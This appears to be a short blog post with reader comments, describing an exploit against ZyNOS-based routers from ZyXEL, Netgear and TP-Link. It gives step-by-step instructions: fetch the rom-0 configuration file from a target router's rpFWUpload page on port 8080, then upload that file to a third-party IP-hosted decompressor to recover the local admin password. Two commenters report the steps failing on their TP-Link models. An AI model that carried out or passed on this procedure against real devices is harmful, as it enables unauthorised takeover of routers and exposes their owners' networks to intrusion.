ZyNOS is the proprietary operating system used on network devices made by the ZyXEL Communications Corporation, ZyXEL Communications Corporation first introduced ZyNOS in 1998.

A vulnerability exists with ZyNOS based routers (ZyXel, Netgear and TP-Link and maybe others) that can allow an attacker to download the rom-0 file and reverse engineer to retrieve the local admin password.

The Exploit

  1. Browse to http://targetip:8080/rpFWUpload.htmlrpFWUpload
  2. Download the ROM file
  3. Browse to http://198.61.167.113/zynosZynOS Config Decompressor LZS
  4. Click on “Choose File” and click on “Upload rom-0”Zynos result

Should you have any questions, comments or suggestions, please don’t hesitate to comment below. If you like what you have read, please share it on your favourite social media medium.

12 Responses to “ZyNOS (ROM-0) Exploit”

  1. arman

    Hi. all I get is this:

    TP-LINK
    public
    public
    public
    public

    My router is TD-W8901G TP-LINK. version 3.

    Reply
  2. omar

    hello i am using tp link td wn8591nd and i cant visit the page or download the rom i have new version of firmware but in my case i have v3 i dont know i can try with other but i think i can’t because i need firmware of zynos os something like that

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.